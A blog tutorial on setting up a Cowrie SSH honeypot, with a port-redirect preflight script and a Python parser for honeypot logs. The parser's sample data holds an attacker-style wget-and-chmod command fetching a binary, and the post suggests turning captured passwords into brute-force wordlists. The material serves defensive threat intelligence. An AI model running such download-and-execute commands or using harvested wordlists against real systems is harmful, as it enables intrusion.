Mining Deep Cyber Space Intelligence by Deploying Your Own Honeypots

Published Apr 09, 2018
What is this article about?

This article aims to give you a general understanding of honeypots.
I will also guide you through installing and deploying your own honeypot using Cowrie, and give you ideas and examples on how to collect and mine the malicious activity your honeypots pick up.

Most importantly, enjoy and appreciate the fun things that are being collected by your honeypots.

What is a honeypot?

Wikipedia has a formal definition, but let's skip that and let me explain it in simple words:

A honeypot is basically a "fake" service that pretends to be a normal, legitimate service in order to lure attackers into targeting it instead of something you actually care about.

What can a honeypot simulate?

  • Fake Server (e.g. Web Server, Tor Node)
  • Fake Service (e.g. SSH, RDP, FTP)
  • Fake ID (e.g. Email Address, Online Accounts)
  • And Much More...

A honeypot can also be the real thing, for example a real server running as-is (a "high-interaction" honeypot). The advantage is that it offers the attacker the full functionality of a real system, so they reveal more of their tooling and intentions. The disadvantage is that you must make sure the attacker cannot escape your control: isolate it on its own network segment, restrict its outbound traffic, and monitor it closely, because in the worst case the attacker uses it as a foothold to pivot further, or traces the setup back to you.

Why You Need One

For LEARNING!

Because a honeypot sits right on the Internet-facing front line, it captures real attack traffic as it happens, in the wild, and gives you the chance to analyze it.

Or, if you run many honeypots in different regions of the world, you can potentially turn yourself into a mini ZoomEye or NORSE Live Attack Map, visualizing this data or building a cyber threat map to track how new threats spread as they come out.

Do you want to build your own brute force dictionaries from the usernames and passwords your honeypot receives?
Yeah mate, you got my idea 😛

For FUN!

I've hosted a nice SSH honeypot called Cowrie (I will show you how to install it in the next part).
Many of its collected results were very interesting:

  • Such as some attackers' personal "ammunition garage" and the weapons they sell.

  • In the old days, some malicious attackers were using my honeypot to try to communicate with Pokemon Go's servers.

  • Or you can visualize the attacks on a map, as I did (see the Splunk note at the end of this article).

  • I've also discovered one attacker who tried to use my honeypot to connect to an IRC room to build his/her IRC botnet. And the IRC admin's name was Jihad... (No screenshots for this one)

For PROFITS!

In practice, honeypots are mostly deployed to collect threat intelligence, or, placed inside an enterprise network, to tie up attackers' time and act as a tripwire: no legitimate user should ever touch them, so any connection to one is a high-confidence alert.

Both of these have profit potential. I will leave them to you to think about 😃 I will also add this one:

  • What if the honeypot could counter-attack (e.g. via a JS payload)? Keep in mind that "hacking back" is illegal in most jurisdictions, and that the source IP you see is very often just another compromised box, so the realistic version of this idea is fingerprinting the visitor rather than compromising it.

You are more than welcome to post thoughts/ideas in the comment section below 😛

Honeypot Setup:

Installation

Here comes the practical part!

Let's install Cowrie on your honeypot server:

Step 1: Install Dependencies

$ sudo apt-get install git virtualenv libmpfr-dev libssl-dev libmpc-dev libffi-dev build-essential libpython-dev -y

Step 2: Create Cowrie User Account

$ sudo adduser --disabled-password cowrie
Adding user `cowrie' ...
Adding new group `cowrie' (1002) ...
Adding new user `cowrie' (1002) with group `cowrie' ...
Changing the user information for cowrie
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]

$ sudo su - cowrie

Step 3: Download Cowrie Repo

$ git clone https://github.com/micheloosterhof/cowrie
Cloning into 'cowrie'...
remote: Counting objects: 2965, done.
remote: Compressing objects: 100% (1025/1025), done.
remote: Total 2965 (delta 1908), reused 2962 (delta 1905), pack-reused 0
Receiving objects: 100% (2965/2965), 3.41 MiB | 2.57 MiB/s, done.
Resolving deltas: 100% (1908/1908), done.
Checking connectivity... done.

$ cd cowrie

Step 4: Create Virtual Environment

$ pwd
/home/cowrie/cowrie

$ virtualenv cowrie-env
New python executable in ./cowrie/cowrie-env/bin/python
Installing setuptools, pip, wheel...done.

$ source cowrie-env/bin/activate
(cowrie-env)

$ pip install --upgrade -r requirements.txt
$ cd bin/
$ ./cowrie start
Starting cowrie in the background...

Step 5: Change SSH port
The real SSH daemon has to move off port 22 so that Cowrie can take it over. Do this from your admin account (the cowrie user has no sudo). Before restarting sshd, make sure your firewall or cloud security group allows the new port, and keep your current SSH session open until you have confirmed that you can log in on the new port; otherwise a typo here locks you out of the box.

$ sudo vim /etc/ssh/sshd_config
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Port 65432
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

Then restart sshd (service ssh restart on Debian/Ubuntu) and test a login on port 65432 from a second terminal before going on.

Step 6: Redirect port 22 to Cowrie
Cowrie listens on port 2222 by default, and as an unprivileged user it cannot bind port 22, so instead we redirect incoming port 22 traffic to 2222 with a NAT rule. Run this from your admin account:

$ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

Two caveats: the rule only affects traffic arriving from the network (PREROUTING), so a connection to port 22 made from the host itself will not reach Cowrie, and the rule is not persistent across reboots unless you save it (for example with the iptables-persistent package). If the host has a public IPv6 address, add the same rule with ip6tables as well.

Step 7: Restart Cowrie

Back as the cowrie user, in /home/cowrie/cowrie:

$ bin/cowrie restart
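Steps 5 to 7 are the point where a mistake costs you access to the box, so here is the check I would script around them. This is an added example and not part of the original post or of Cowrie: it refuses to add the port 22 redirect until sshd_config no longer lists Port 22, the admin port is present in it, and both the admin sshd port and Cowrie's port are actually listening. The port numbers, the script name and the Debian/Ubuntu assumptions (iptables, ss, run as root) are hypothetical defaults that can be overridden through the environment.

```shell
#!/bin/sh
# Added example, not from the original post or the Cowrie project: preflight
# and apply for the "port 22 -> Cowrie" redirect of Steps 5-7. Assumes a
# Debian/Ubuntu host with iptables and ss, run as root: ./redirect.sh --apply
# ADMIN_PORT / COWRIE_PORT / SSHD_CONFIG are hypothetical defaults.
set -eu

ADMIN_PORT="${ADMIN_PORT:-65432}"      # where the real sshd listens now
COWRIE_PORT="${COWRIE_PORT:-2222}"     # where Cowrie listens
SSHD_CONFIG="${SSHD_CONFIG:-/etc/ssh/sshd_config}"

# Print every port sshd will bind according to a config file, space separated.
# sshd listens on ALL uncommented "Port" lines, so every one of them matters;
# with none present it falls back to 22. Commented lines ("#Port 22") are ignored.
sshd_ports_from_config() {
    ports=$(awk 'tolower($1) == "port" { print $2 }' "$1" | tr '\n' ' ')
    ports="${ports% }"
    printf '%s\n' "${ports:-22}"
}

# Return 0 only if the config keeps the admin port ($2) and does not keep 22.
config_is_safe() {
    ok=1
    for p in $(sshd_ports_from_config "$1"); do
        [ "$p" = "22" ] && return 1
        [ "$p" = "$2" ] && ok=0
    done
    return "$ok"
}

# True if some process listens on TCP port $1 (ss prints a header line first).
port_is_listening() {
    ss -ltn "sport = :$1" | tail -n +2 | grep -q .
}

# Add the NAT redirect once; "iptables -C" checks whether the rule already exists.
apply_redirect() {
    iptables -t nat -C PREROUTING -p tcp --dport 22 -j REDIRECT --to-port "$COWRIE_PORT" 2>/dev/null ||
        iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port "$COWRIE_PORT"
}

main() {
    config_is_safe "$SSHD_CONFIG" "$ADMIN_PORT" || {
        echo "refusing: $SSHD_CONFIG must list Port $ADMIN_PORT and must not list Port 22" >&2
        exit 1
    }
    port_is_listening "$ADMIN_PORT" || {
        echo "refusing: nothing listens on $ADMIN_PORT; restart sshd and test a login there first" >&2
        exit 1
    }
    port_is_listening "$COWRIE_PORT" || {
        echo "refusing: Cowrie is not listening on $COWRIE_PORT (bin/cowrie start)" >&2
        exit 1
    }
    apply_redirect
    echo "port 22 -> Cowrie on $COWRIE_PORT; admin SSH stays on $ADMIN_PORT (remember to persist the rule)"
}

if [ "${1:-}" = "--apply" ]; then
    main
fi
```

The checks are deliberately ordered: a config that still contains Port 22 is rejected before anything touches the firewall, and the script never restarts sshd for you, so the "keep a second session open" rule from Step 5 still applies when you restart it by hand.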

Testing Out

Now connect to port 22 of the honeypot host from another machine (remember that the PREROUTING rule does not catch connections made from the host itself), as username "root" with password "admin", a combination Cowrie's default userdb accepts:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

root@svr04:~# whoami
root

root@svr04:~# ping google.com
PING google.com (29.89.32.244) 56(84) bytes of data.
64 bytes from google.com (29.89.32.244): icmp_seq=1 ttl=50 time=44.4 ms
64 bytes from google.com (29.89.32.244): icmp_seq=2 ttl=50 time=42.5 ms
64 bytes from google.com (29.89.32.244): icmp_seq=3 ttl=50 time=40.5 ms
^C
--- google.com ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 907ms
rtt min/avg/max/mdev = 48.264/50.352/52.441/2.100 ms

root@svr04:~# uname -a
Linux svr04 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u1 x86_64 GNU/Linux

root@svr04:~# apt install python
bash: apt: command not found

root@svr04:~# yum install python
bash: yum: command not found

root@svr04:~# wget google.com
--2018-04-05 05:43:22--  http://google.com
Connecting to google.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html; charset=ISO-8859-1]
Saving to: `/root/index.html'

100%[======================================>] 0            100K/s  eta 0s

2018-04-05 05:43:22 (100 KB/s) - `/root/index.html' saved [10593/0]

root@svr04:~# ls
index.html 

root@svr04:~# cat index.html 
<!doctype html><html itemscope="" ite.............(and more...)

On the honeypot's side, the attacker's actions are logged in text form in /home/cowrie/cowrie/log/cowrie.log, and the same events are written one JSON object per line to /home/cowrie/cowrie/log/cowrie.json, which is the format to use for any automated processing. The TTY log referenced below (log/tty/...) is a full recording of the session that can be replayed with bin/playlog.

For demonstration purposes, I've removed extra information, such as the datetime, networking logs, and my own IPs.

New connection: XXX.XXX.XXX.XXX:34252 (XXX.XXX.XXX.XXX:2222)
Remote SSH version: SSH-2.0-OpenSSH_7.5p1 Ubuntu-10ubuntu0.1
...
login attempt [root/admin] succeeded
Initialized emulated server as architecture: linux-x64-lsb
...
pty request: 'xterm-256color' (51, 181, 1270, 769)
Terminal Size: 51 181
request_env: LANG=en_US.UTF-8
getting shell
Opening TTY Log: log/tty/20180405-054249-c9f804dbd74c-0i.log
CMD: whoami
Command found: whoami 
CMD: ping google.com
Command found: ping google.com
CMD: uname -a
Command found: uname -a
CMD: apt install python
Command not found: apt install python
CMD: yum install python
Command not found: yum install python
CMD: wget google.com
Command found: wget google.com
Starting factory <HTTPProgressDownloader: http://google.com>
...
CMD: ls
Command found: ls 
CMD: cat index.html 
Command found: cat /root/index.html
connection lost
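The text log above is for reading; for the "collect the malicious information" and "build your own brute force dictionary" ideas from earlier in the article, the JSON log is the one to process. The following is an added example, not code from the original post or from the Cowrie project: it parses cowrie.json lines and pulls out the tried credentials, the successful sessions, the commands typed in each session, the files fetched, and per-source counts. SAMPLE_LOG is constructed for this example (the IPs are documentation ranges); the field names follow Cowrie's JSON event format (eventid, src_ip, username, password, input, url, shasum, session, timestamp), and the corrupt last line is there on purpose, since a live log's tail is often a half-written line.

```python
"""Mine a Cowrie JSON log for credentials, commands, downloads and sources.

Added example, not part of the original post or of Cowrie itself.
SAMPLE_LOG is constructed test data; field names follow Cowrie's cowrie.json.
"""
import json
from collections import Counter, defaultdict

SAMPLE_LOG = r'''
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.10","src_port":34252,"session":"c9f804dbd74c","timestamp":"2018-04-05T05:42:40Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"203.0.113.10","session":"c9f804dbd74c","timestamp":"2018-04-05T05:42:43Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","src_ip":"203.0.113.10","session":"c9f804dbd74c","timestamp":"2018-04-05T05:42:49Z"}
{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"203.0.113.10","session":"c9f804dbd74c","timestamp":"2018-04-05T05:43:01Z"}
{"eventid":"cowrie.command.input","input":"wget http://198.51.100.7/x86 -O /tmp/x86; chmod +x /tmp/x86","src_ip":"203.0.113.10","session":"c9f804dbd74c","timestamp":"2018-04-05T05:43:22Z"}
{"eventid":"cowrie.session.file_download","url":"http://198.51.100.7/x86","outfile":"dl/9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08","shasum":"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08","src_ip":"203.0.113.10","session":"c9f804dbd74c","timestamp":"2018-04-05T05:43:23Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","src_ip":"198.51.100.23","session":"1a2b3c4d5e6f","timestamp":"2018-04-05T06:01:00Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"198.51.100.23","session":"1a2b3c4d5e6f","timestamp":"2018-04-05T06:01:02Z"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","src_ip":"198.51.100.23","session":"1a2b3c4d5e6f","timestamp":"2018-04-05T06:01:04Z"}
not json: a corrupt (half-written) line that the parser must skip
'''

LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")


def parse_events(text):
    """Return one dict per well-formed JSON line; blank and corrupt lines are skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except ValueError:          # json.JSONDecodeError is a ValueError
            continue
        if isinstance(ev, dict) and "eventid" in ev:
            events.append(ev)
    return events


def load_log(path):
    """Same as parse_events, reading a cowrie.json file from disk."""
    with open(path, encoding="utf-8") as fh:
        return parse_events(fh.read())


def credential_stats(events):
    """Count every (username, password) pair tried, failed or not."""
    creds = Counter()
    for ev in events:
        if ev["eventid"] in LOGIN_EVENTS:
            creds[(ev.get("username", ""), ev.get("password", ""))] += 1
    return creds


def wordlist(creds, min_count=1):
    """Distinct passwords, most frequently tried first: the brute force dictionary."""
    per_pw = Counter()
    for (_, pw), n in creds.items():
        per_pw[pw] += n
    return [pw for pw, n in per_pw.most_common() if n >= min_count]


def successful_sessions(events):
    """session id -> (src_ip, username, password) for logins Cowrie accepted."""
    return {ev["session"]: (ev["src_ip"], ev["username"], ev["password"])
            for ev in events if ev["eventid"] == "cowrie.login.success"}


def commands_by_session(events):
    """session id -> list of commands typed, in order (what the attacker did after login)."""
    out = defaultdict(list)
    for ev in events:
        if ev["eventid"] == "cowrie.command.input":
            out[ev["session"]].append(ev["input"])
    return dict(out)


def downloads(events):
    """(url, sha256) for each file pulled into the honeypot; the hash is the
    thing to look up in a malware database, the URL usually dies within hours."""
    return [(ev.get("url"), ev.get("shasum"))
            for ev in events if ev["eventid"] == "cowrie.session.file_download"]


def attackers_by_ip(events):
    """Login attempts per source IP, the raw input for a threat map."""
    return Counter(ev["src_ip"] for ev in events if ev["eventid"] in LOGIN_EVENTS)


def report(events):
    print("top credentials:", credential_stats(events).most_common(5))
    print("wordlist:", wordlist(credential_stats(events)))
    print("sessions:", successful_sessions(events))
    print("commands:", commands_by_session(events))
    print("downloads:", downloads(events))
    print("sources:", attackers_by_ip(events).most_common())


if __name__ == "__main__":
    report(parse_events(SAMPLE_LOG))
```

Point load_log at log/cowrie.json instead of SAMPLE_LOG to run it against a real honeypot; the per-IP and per-credential counters are exactly what the geolocation lookup and heatmap described further down consume.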

You can also add new username:password combinations in Cowrie by modifying /home/cowrie/cowrie/data/userdb.txt.

Cowrie also supports Splunk output for visualization and analytics: enable it in Cowrie's configuration, or simply install a Splunk forwarder that ships cowrie.json.

The attack map I mentioned above was done in Splunk using nothing more than a geolocation lookup on the source IP and a heatmap.
However, feel free to create your own visualizations of the malicious data using D3.js or other visualization tools. 😃

PS. You will probably find this helpful too: Send Cowrie Output to a MySQL Database.

I hope this article gave you a fresh perspective on honeypots. If you have any questions or thoughts, you're welcome to comment below.

Happy Honeypotting! 😛

The End
